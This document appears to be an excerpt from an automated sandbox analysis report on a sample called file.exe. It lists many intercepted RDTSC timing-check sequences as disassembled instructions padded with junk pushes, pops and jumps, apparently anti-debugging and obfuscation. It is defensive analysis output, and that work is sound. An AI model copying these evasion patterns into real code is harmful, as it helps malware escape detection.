                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C2BD second address: 112C2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C2C2 second address: 112C321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0DECD24179h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0DECD24174h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0DECD24172h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C321 second address: 112C33B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D7Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C607 second address: 112C60D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C6D2 second address: 112C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0DED622D78h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBAE second address: 112CBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBB2 second address: 112CBBF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBBF second address: 112CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112CBC5 second address: 112CC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0DED622D89h 0x0000000c nop 0x0000000d jnp 00007F0DED622D78h 0x00000013 mov ch, 8Dh 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F0DED622D78h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 jmp 00007F0DED622D7Dh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jg 00007F0DED622D8Ah 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986B1 second address: 11986B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986B5 second address: 11986C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0DED622D76h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986C8 second address: 11986CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986CC second address: 11986D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119884D second address: 119885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F0DECD24166h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119885C second address: 1198866 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DED622D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198866 second address: 119886C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119886C second address: 1198883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D83h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198883 second address: 1198887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198887 second address: 1198897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0DED622D76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198897 second address: 119889B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198FCF second address: 1198FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198FD4 second address: 1199015 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24178h 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jng 00007F0DECD24166h 0x00000015 jp 00007F0DECD24166h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F0DECD2416Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11996C6 second address: 11996E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11996E2 second address: 119970A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0DECD24166h 0x0000000f jmp 00007F0DECD24173h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197CC9 second address: 1197CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197CCE second address: 1197CD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A151B second address: 11A1535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0DED622D76h 0x0000000a jg 00007F0DED622D76h 0x00000010 jno 00007F0DED622D76h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1535 second address: 11A153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A10C1 second address: 11A10E0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0DED622D76h 0x00000008 jmp 00007F0DED622D85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE0BD second address: 11AE0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B02A7 second address: 11B02CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0DED622D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0DED622D89h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2A9C second address: 11B2AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5720 second address: 11B5745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Bh 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e push edx 0x0000000f jng 00007F0DED622D76h 0x00000015 pop edx 0x00000016 pushad 0x00000017 jg 00007F0DED622D76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5745 second address: 11B574B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B51C3 second address: 11B51C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5311 second address: 11B5317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA05A second address: 11BA072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA072 second address: 11BA076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9B0F second address: 11C9B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0DED622D87h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DED622D7Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9B3B second address: 11C9B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C84F6 second address: 11C84FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8918 second address: 11C891D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C21 second address: 11C8C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0DED622D76h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C39 second address: 11C8C3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C3F second address: 11C8C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D7Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C980B second address: 11C983A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F0DECD24174h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F0DECD24166h 0x00000015 jmp 00007F0DECD2416Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C983A second address: 11C9855 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0DED622D7Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE22D second address: 11CE243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DECD24172h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D941E second address: 11D9423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DAD73 second address: 11DAD7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDB90 second address: 11DDB94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDB94 second address: 11DDB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDB9D second address: 11DDBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0DED622D76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F0DED622D7Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBBC second address: 11DDBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0DECD24166h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBC8 second address: 11DDBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBD1 second address: 11DDBE4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0DECD24166h 0x00000008 jc 00007F0DECD24166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB827 second address: 11EB82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB82D second address: 11EB833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB833 second address: 11EB83E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB3C4 second address: 11EB3DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24175h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA202 second address: 11FA223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F0DED622D86h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA223 second address: 11FA228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA228 second address: 11FA245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D83h 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3A7 second address: 11FA3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007F0DECD24166h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3B7 second address: 11FA3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3BC second address: 11FA3C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAABD second address: 11FAAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAC1 second address: 11FAAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAC5 second address: 11FAAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0DED622D7Ch 0x0000000c jno 00007F0DED622D76h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0DED622D80h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAED second address: 11FAAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAF1 second address: 11FAB0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0DED622D7Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAE1D second address: 11FAE4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0DECD24177h 0x0000000a pop edx 0x0000000b jnp 00007F0DECD24168h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jnp 00007F0DECD2416Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAE4D second address: 11FAE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0DED622D7Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAE63 second address: 11FAE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF1F5 second address: 11FF1FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF2CE second address: 11FF2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF2D2 second address: 11FF2D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF2D8 second address: 11FF2E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0DECD24166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF79C second address: 11FF7A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF7A1 second address: 11FF7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0DECD24168h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dx, si 0x00000027 push eax 0x00000028 mov dh, 5Ah 0x0000002a pop edx 0x0000002b push dword ptr [ebp+122D1CABh] 0x00000031 push esi 0x00000032 sub dword ptr [ebp+12472488h], esi 0x00000038 pop edx 0x00000039 call 00007F0DECD24169h 0x0000003e push esi 0x0000003f pushad 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF7EB second address: 11FF7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0DED622D76h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF7FB second address: 11FF817 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0DECD24166h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF817 second address: 11FF839 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DED622D86h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D4B second address: 1200D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D51 second address: 1200D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F0DED622D7Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D64 second address: 1200D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D6A second address: 1200D94 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DED622D76h 0x00000008 jmp 00007F0DED622D85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200D94 second address: 1200D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0417 second address: 54F04B6 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 83CFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F0DED622D84h 0x0000000e and esi, 3A780278h 0x00000014 jmp 00007F0DED622D7Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F0DED622D86h 0x00000021 push eax 0x00000022 pushad 0x00000023 push ebx 0x00000024 mov ax, FB33h 0x00000028 pop eax 0x00000029 mov bh, CAh 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F0DED622D7Dh 0x00000036 sub eax, 04F29C76h 0x0000003c jmp 00007F0DED622D81h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007F0DED622D80h 0x00000048 sbb si, 6198h 0x0000004d jmp 00007F0DED622D7Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04B6 second address: 54F04BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04BC second address: 54F04C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04C0 second address: 54F04EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DECD24175h 0x00000014 rdtsc
